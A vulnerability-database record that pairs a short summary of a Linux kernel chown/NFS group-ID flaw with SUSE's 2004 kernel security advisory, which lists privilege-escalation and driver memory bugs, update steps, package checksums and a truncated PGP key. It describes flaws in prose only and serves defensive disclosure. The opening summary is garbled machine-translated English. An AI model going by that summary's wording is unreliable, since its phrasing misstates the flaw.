    "data": "Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of files, such as NFS exported files in kernel 2.4. Linux Kernel of NFS The server inode_change_ok() Due to incomplete file owner check in the function, NFS If you are exporting for client mounting, NFS Files that cannot be changed by the client GID There is a vulnerability that can be modified illegally.file of GID May be altered illegally. For the Linux kernel 2.4.X this issue is only exploitable when the kernel NFS server is active, for the 2.6.X kernel this issue is always exploitable. \nAn attacker may reportedly be able to exploit this issue to gain superuser privileges. \nThis issue was reported in version 2.6.6, but other versions, including 2.4.X, are also likely vulnerable. Red Hat Enterprise Linux includes the 2.4 kernel. -----BEGIN PGP SIGNED MESSAGE-----\n\n______________________________________________________________________________\n\n                        SUSE Security Announcement\n\n        Package:                kernel\n        Announcement-ID:        SUSE-SA:2004:020\n        Date:                   Tuesday, Jul 2nd 2004 18:00 MEST\n        Affected products:      8.0, 8.1, 8.2, 9.0, 9.1\n                                SUSE Linux Database Server,\n                                SUSE eMail Server III, 3.1\n                                SUSE Linux Enterprise Server 7, 8\n                                SUSE Linux Firewall on CD/Admin host\n                                SUSE Linux Connectivity Server\n                                SUSE Linux Office Server\n        Vulnerability Type:     local privilege escalation\n        Severity (1-10):        6\n        SUSE default package:   yes\n        Cross References:\tCAN-2004-0495\n\t\t\t\tCAN-2004-0496\n\t\t\t\tCAN-2004-0497\n\t\t\t\tCAN-2004-0535\n\t\t\t\tCAN-2004-0626\n\n\n    Content of this advisory:\n        1) security vulnerability resolved:\n\t\t- chown: users can change the group affiliation of arbitrary\n\t\t  files to the group they belong to\n\t\t- missing DAC check in chown(2): local privilege escalation\n\t        - overflow with signals: local denial-of-service\n        \t- pss, mpu401 sound driver: read/write to complete memory\n\t        - airo driver: read/write to complete memory\n        \t- ALSA: copy_from_user/copy_to_user confused\n        \t- acpi_asus: read from random memory\n        \t- decnet: write to memory without checking\n        \t- e1000 driver: read complete memory\n           problem description, discussion, solution and upgrade information\n        2) pending vulnerabilities, solutions, workarounds:\n\t\t- icecast\n                - sitecopy\n                - cadaver\n                - OpenOffice_org\n                - tripwire\n                - postgresql*\n                - mod_proxy\n\t\t- freeswan\n\t\t- ipsec-tools\n\t\t- less\n\t\t- libpng\n\t\t- pavuk\n\t\t- XFree86*\n\t\t- kdebase3\n        3) standard appendix (further information)\n\n______________________________________________________________________________\n\n1)  problem description, brief discussion, solution, upgrade information\n\n    Multiple security vulnerabilities are being addressed with this security\n    update of the Linux kernel. \n\n    Kernel memory access vulnerabilities are fixed in the e1000, decnet, \n    acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These \n    vulnerabilities can lead to kernel memory read access, write access \n    and local denial of service conditions, resulting in access to the \n    root account for an attacker with a local account on the affected \n    system. \n\n    Missing Discretionary Access Control (DAC) checks in the chown(2) system\n    call allow an attacker with a local account to change the group\n    ownership of arbitrary files, which leads to root privileges on affected\n    systems. It is specific to kernel version 2.6 based systems such as \n    the SUSE Linux 9.1 product, that only local shell access is needed to \n    exploit this vulnerability. An interesting variant of the missing \n    checks is that the ownership of files in the /proc filesystem can be \n    altered, while the changed ownership still does not allow the files to \n    be accessed as a non-root user for to be able to exploit the \n    vulnerability. If the knfsd NFS \n    server is not activated (it is off by default), the vulnerability is \n    not exposed. These issues related to the chown(2) system call have been \n    discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX. \n\n    The only network-related vulnerability fixed with the kernel updates\n    that are subject to this announcement affect the SUSE Linux 9.1 \n    distribution only, as it is based on a 2.6 kernel. Found and reported \n    to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability \n    allows a remote attacker to send a specially crafted TCP packet to a \n    vulnerable system, causing that system to stall if it makes use of \n    TCP option matching netfilter rules. \n\n    In some rare configurations of the SUSE Linux 9.1 distribution, some \n    users have experienced stalling systems during system startup. These \n    problems are fixed with this kernel update. \n\n\n\n    SPECIAL INSTALL INSTRUCTIONS:\n    ==============================\n    For the impatient: Run YOU (Yast2 Online Update, command \n    \"yast2 online_update\" as root) to install the updates (semi) \n    automatically, if you have a SUSE Linux 8.1 and newer system. \n\n    For those who wish to install their kernel updates manually and for \n    those who use a SUSE Linux 8.0 system:\n\n    The following paragraphs will guide you through the installation\n    process in a step-by-step fashion. The character sequence \"****\"\n    marks the beginning of a new paragraph. In some cases, the steps\n    outlined in a particular paragraph may or may not be applicable\n    to your situation. \n    Therefore, please make sure to read through all of the steps below\n    before attempting any of these procedures. \n    All of the commands that need to be executed are required to be\n    run as the superuser (root). Each step relies on the steps before\n    it to complete successfully. \n\n\n  **** Step 1: Determine the needed kernel type\n\n    Please use the following command to find the kernel type that is\n    installed on your system:\n\n      rpm -qf /boot/vmlinuz\n\n    Following are the possible kernel types (disregard the version and\n    build number following the name separated by the \"-\" character)\n\n      k_deflt   # default kernel, good for most systems. \n      k_i386    # kernel for older processors and chipsets\n      k_athlon  # kernel made specifically for AMD Athlon(tm) family processors\n      k_psmp    # kernel for Pentium-I dual processor systems\n      k_smp     # kernel for SMP systems (Pentium-II and above)\n      k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM\n      kernel-64k-pagesize\n      kernel-bigsmp\n      kernel-default\n      kernel-smp\n\n  **** Step 2: Download the package for your system\n\n    Please download the kernel RPM package for your distribution with the\n    name as indicated by Step 1. The list of all kernel rpm packages is\n    appended below. Note: The kernel-source package does not\n    contain a binary kernel in bootable form. Instead, it contains the\n    sources that the binary kernel rpm packages are created from. It can be\n    used by administrators who have decided to build their own kernel. \n    Since the kernel-source.rpm is an installable (compiled) package that\n    contains sources for the linux kernel, it is not the source RPM for\n    the kernel RPM binary packages. \n\n    The kernel RPM binary packages for the distributions can be found at the\n    locations below ftp://ftp.suse.com/pub/suse/i386/update/. \n\n      8.0/images/\n      8.1/rpm/i586\n      8.2/rpm/i586\n      9.0/rpm/i586\n      9.1/rpm/i586\n\n    After downloading the kernel RPM package for your system, you should\n    verify the authenticity of the kernel rpm package using the methods as\n    listed in section 3) of each SUSE Security Announcement. \n\n\n  **** Step 3: Installing your kernel rpm package\n\n    Install the rpm package that you have downloaded in Steps 3 or 4 with\n    the command\n        rpm -Uhv --nodeps --force \u003cK_FILE.RPM\u003e\n    where \u003cK_FILE.RPM\u003e is the name of the rpm package that you downloaded. \n\n    Warning: After performing this step, your system will likely not be\n             able to boot if the following steps have not been fully\n             followed. \n\n\n    If you run SUSE LINUX 8.1 and haven\u0027t applied the kernel update\n    (SUSE-SA:2003:034), AND you are using the freeswan package, you also\n    need to update the freeswan rpm as a dependency as offered\n    by YOU (YaST Online Update). The package can be downloaded from\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\n\n  **** Step 4: configuring and creating the initrd\n\n    The initrd is a ramdisk that is loaded into the memory of your\n    system together with the kernel boot image by the bootloader. The\n    kernel uses the content of this ramdisk to execute commands that must\n    be run before the kernel can mount its actual root filesystem. It is\n    usually used to initialize SCSI drivers or NIC drivers for diskless\n    operation. \n\n    The variable INITRD_MODULES in /etc/sysconfig/kernel determines\n    which kernel modules will be loaded in the initrd before the kernel\n    has mounted its actual root filesystem. The variable should contain\n    your SCSI adapter (if any) or filesystem driver modules. \n\n    With the installation of the new kernel, the initrd has to be\n    re-packed with the update kernel modules. Please run the command\n\n      mk_initrd\n\n    as root to create a new init ramdisk (initrd) for your system. \n    On SuSE Linux 8.1 and later, this is done automatically when the\n    RPM is installed. \n\n\n  **** Step 5: bootloader\n\n    If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\n    are two options:\n    Depending on your software configuration, you have either the lilo\n    bootloader or the grub bootloader installed and initialized on your\n    system. \n    The grub bootloader does not require any further actions to be\n    performed after the new kernel images have been moved in place by the\n    rpm Update command. \n    If you have a lilo bootloader installed and initialized, then the lilo\n    program must be run as root. Use the command\n\n      grep LOADER_TYPE /etc/sysconfig/bootloader\n\n    to find out which boot loader is configured. If it is lilo, then you\n    must run the lilo command as root. If grub is listed, then your system\n    does not require any bootloader initialization. \n\n    Warning: An improperly installed bootloader may render your system\n             unbootable. \n\n  **** Step 6: reboot\n\n    If all of the steps above have been successfully completed on your\n    system, then the new kernel including the kernel modules and the\n    initrd should be ready to boot. The system needs to be rebooted for\n    the changes to become active. Please make sure that all steps have\n    completed, then reboot using the command\n        shutdown -r now\n    or\n        init 6\n\n    Your system should now shut down and reboot with the new kernel. \n\n\n    There is no workaround known. \n\n\n    Please download the update package for your distribution and verify its\n    integrity by the methods listed in section 3) of this announcement. \n    Then, install the package using the command \"rpm -Fhv file.rpm\" to apply\n    the update. \n    Our maintenance customers are being notified individually. The packages\n    are being offered to install from the maintenance web. \n\n\n\n\n\n    x86 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm\n      800418d3dddf6d3b83925f562842205a\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm\n      0cb990b159e10685bb29b76d312ddd25\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm\n      ede031495ee19d8b6eca1873e7155332\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      620ef40226fec31a773397cf3051bf36\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      9b61b5a70b304f5554cb18a6bae5b5fd\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm\n      227c85280ee17a66c8590fe1bb14c596\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      895fee3033de0810ff1173ce8ee87936\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      48be395b96329909486ae3a5152348fa\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      4cd322b4f511d5fe4c483ed28a82097e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      262e33cebf1b0d35fb6d3235c9ab8815\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm\n      8d81370f90736b12aa71b9c744f6e0e2\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm\n      bc59c838c84ba318dc4d24da08a3022e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      f9586ba982e0398c3e48871955b661aa\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      18673b0bf347fe9557d4e67ca02000c0\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm\n      71496daac44196b0e0a3836ee6a3b4ed\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      7c208e9e3f7be1a68c3c8457eb2cafc4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm\n      b77863c863aaf4b931bff263220e6ec9\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm\n      bed7e964e22c5e5d2f5e7a5e3816dde4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      6b5137bf379fbfc861441151039575da\n\n    SUSE Linux 8.2:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm\n      50d261b44616f9145a0dc16df501a504\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm\n      10095854c0bdae20991d90b822352e14\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm\n      a2ef7cfb0e62ad955dda2b0574eb3150\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm\n      1d2b0d0e2c7998685ed04c24e593b196\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm\n      d8bf98c46ba5313db286d5706f7fb3b8\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm\n      e13a7b4c2b185cfeb991c31607f79ccb\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm\n      0e2f2cf20e7d7a20f3e50b245105df61\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm\n      6cfac2914d3827ec562ff9d6be29c566\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm\n      afd29843aa69d805ef5f25d39ecd0e7f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm\n      098a1400a48404931acb8b3eb2e821fb\n\n    SUSE Linux 8.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      3bdaa593d09a7cbff632a2c4446d5603\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      ba60d0b2b6d3bc9c38b4e8b3859e1586\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      ffa8983669004826a0cbedbe34dced76\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm\n      25174fd007f5a39ee0342dd6f18f2eaa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      10837fa561cd5104e55d48e46c837764\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm\n      c37e8b87819602e77b14206affef00fa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm\n      7be68a677db5a65be1a46ec194b35497\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm\n      8e4b7d5a6bb81da5a00971cdcc4ec641\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm\n      d8ba1db81a9b517f867c970e4fc443a7\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm\n      96a0a9242d066083c7bff8e0f70b7bbe\n\n    SUSE Linux 8.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm\n      ec1e53b3812c0c0bd3681435d69fb134\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm\n      583164e52019ae090fd47e425c2a933e\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm\n      9ac8983abef05697d75f3117e37e5f18\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm\n      4932c4d6a42fc9be02013f398ab5bb96\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm\n      b9de0731f9bbc4b016455a6d52cd8296\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm\n      a73bacad80432c26e856c41338b154bd\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm\n      782902cd14e7776db66bd61a12beee03\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm\n      d71fa5cda488ae18f8d023cd8f28bb73\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm\n      a360a9e6ed2db54f69e17db36f02614f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm\n      8017fd6ff8a6fc1a0660ab35ad174388\n\n\n\n    x86-64 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm\n      e2c53fd24991f739fd754c07f7aa8293\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm\n      f4a69622b7628cdd662a4e39aa59b60e\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm\n      e71adfb1fc662600eb11d3acf67c3dc3\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      f6a364879d1f2ae2cf854810d61be3ac\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      a0096d1fc067d89c9200ea3904713d59\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      bf6d0439cfc37b50b4f6822c3403a74f\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm\n      17e008a737e5e95e71335e34fa7f86cf\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm\n      ca742b550b1a503595b02cbfc9e0e481\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm\n      8e0c16c42d1a89aa6a09be1dd575de47\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      58b1bf42b5661119d06a04888144707a\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      5103001136e39fca5a59f4cbde82822b\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      231c9e5e00f17df8cfd72d6c8a68d9cf\n\n\n______________________________________________________________________________\n\n2)  Pending vulnerabilities in SUSE Distributions and Workarounds:\n\n    - icecast\n    The icecast service is vulnerable to a remote denial-of-service\n    attack. Update packages will be available soon. \n\n    - sitecopy\n    The sitecopy package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - cadaver\n    The cadaver package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - OpenOffice_org\n    The OpenOffice_org package includes a vulnerable version\n    of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\n    will be available soon. \n\n    - tripwire\n    A format string bug in tripwire can be exploited locally\n    to gain root permissions. \n    New packages are available. \n\n    - postgresql\n    A buffer overflow in psqlODBC could be exploited to crash the\n    application using it. E.g. a PHP script that uses ODBC to access a\n    PostgreSQL database can be utilized to crash the surrounding Apache\n    web-server. Other parts of PostgreSQL are not affected. \n    New packages are available. \n\n    - XDM/XFree86\n    This update resolves random listening to ports by XDM\n    that allows to connect via the XDMCP. SUSE LINUX 9.1\n    is affected only. \n    New packages are available. \n\n    - mod_proxy\n    A buffer overflow can be triggered by malicious remote\n    servers that return a negative Content-Length value. \n    This vulnerability can be used to execute commands remotely\n    New packages are available. \n\n    - freeswan\n    A bug in the certificate chain authentication code could allow an\n    attacker to authenticate any host against a FreeS/WAN server by\n    presenting specially crafted certificates wrapped in a PKCS#7 file. \n    The packages are currently being tested and will be available soon. \n\n    - ipsec-tools\n    The racoon daemon which is responsible for handling IKE messages\n    fails to reject invalid or self-signed X.509 certificates which\n    allows for man-in-the-middle attacks on IPsec tunnels established\n    via racoon. \n    The packages are currently being tested and will be available soon. \n\n    - less\n    This update fixes a possible symlink attack in lessopen.sh. The\n    attack can be executed by local users to overwrite arbitrary files\n    with the privileges of the user running less. \n    New packages are available. \n\n    - libpng\n    This update adds a missing fix for CAN-2002-1363. \n    New packages are available. \n\n    - pavuk\n    This update fixes a remotely exploitable buffer overflow in pavuk. \n    Thanks to Ulf Harnhammar for reporting this to us. \n    New packages are available. \n\n    - kdebase3\n    This update fixes a possible attack on tmp files created at the\n    first login of a user using KDE or at the first time running a\n    KDE application. This bug can be exploited locally to overwrite\n    arbitrary files with the privilege of the victim user. \n    Just affects SUSE LINUX 9.1\n    New packages are available. \n\n______________________________________________________________________________\n\n3)  standard appendix: authenticity verification, additional information\n\n  - Package authenticity verification:\n\n    SUSE update packages are available on many mirror ftp servers around\n    the world. While this service is considered valuable and important\n    to the free and open source software community, many users wish to be\n    certain as to be the origin of the package and its content before\n    installing the package. There are two independent verification methods\n    that can be used to prove the authenticity of a downloaded file or\n    rpm package:\n    1) md5sums as provided in the (cryptographically signed) announcement. \n    2) using the internal gpg signatures of the rpm package. \n\n    1) execute the command\n        md5sum \u003cname-of-the-file.rpm\u003e\n       after you have downloaded the file from a SUSE ftp server or its\n       mirrors. Then, compare the resulting md5sum with the one that is\n       listed in the announcement. Since the announcement containing the\n       checksums is cryptographically signed (usually using the key\n       security@suse.de), the checksums offer proof of the authenticity\n       of the package. \n       We recommend against subscribing to security lists which cause the\n       email message containing the announcement to be modified so that\n       the signature does not match after transport through the mailing\n       list software. \n       Downsides: You must be able to verify the authenticity of the\n       announcement in the first place. If RPM packages are being rebuilt\n       and a new version of a package is published on the ftp server, all\n       md5 sums for the files are useless. \n\n    2) rpm package signatures provide an easy way to verify the authenticity\n       of an rpm package. Use the command\n        rpm -v --checksig \u003cfile.rpm\u003e\n       to verify the signature of the package, where \u003cfile.rpm\u003e is the\n       filename of the rpm package that you have downloaded. Of course,\n       package authenticity verification can only target an un-installed rpm\n       package file. \n       Prerequisites:\n        a) gpg is installed\n        b) The package is signed using a certain key. The public part of this\n           key must be installed by the gpg program in the directory\n           ~/.gnupg/ under the user\u0027s home directory who performs the\n           signature verification (usually root). You can import the key\n           that is used by SUSE in rpm packages for SUSE Linux by saving\n           this announcement to a file (\"announcement.txt\") and\n           running the command (do \"su -\" to be root):\n            gpg --batch; gpg \u003c announcement.txt | gpg --import\n           SUSE Linux distributions version 7.1 and thereafter install the\n           key \"build@suse.de\" upon installation or upgrade, provided that\n           the package gpg is installed. The file containing the public key\n           is placed at the top-level directory of the first CD (pubring.gpg)\n           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . \n\n\n  - SUSE runs two security mailing lists to which any interested party may\n    subscribe:\n\n    suse-security@suse.com\n        -   general/linux/SUSE security discussion. \n            All SUSE security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-subscribe@suse.com\u003e. \n\n    suse-security-announce@suse.com\n        -   SUSE\u0027s announce-only mailing list. \n            Only SUSE\u0027s security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-announce-subscribe@suse.com\u003e. \n\n    For general information or the frequently asked questions (faq)\n    send mail to:\n        \u003csuse-security-info@suse.com\u003e or\n        \u003csuse-security-faq@suse.com\u003e respectively. \n\n    =====================================================================\n    SUSE\u0027s security contact is \u003csecurity@suse.com\u003e or \u003csecurity@suse.de\u003e. \n    The \u003csecurity@suse.de\u003e public key is listed below. \n    =====================================================================\n______________________________________________________________________________\n\n    The information in this advisory may be distributed or reproduced,\n    provided that the advisory is not modified in any way. In particular,\n    it is desired that the clear-text signature must show proof of the\n    authenticity of the text. \n    SUSE Linux AG makes no warranties of any kind whatsoever with respect\n    to the information contained in this security advisory. \n\nType Bits/KeyID    Date       User ID\npub  2048R/3D25D3D9 1999-03-06 SuSE Security Team \u003csecurity@suse.de\u003e\npub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key \u003cbuild@suse.de\u003e\n\n#####-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see http://www.gnupg.org\n\n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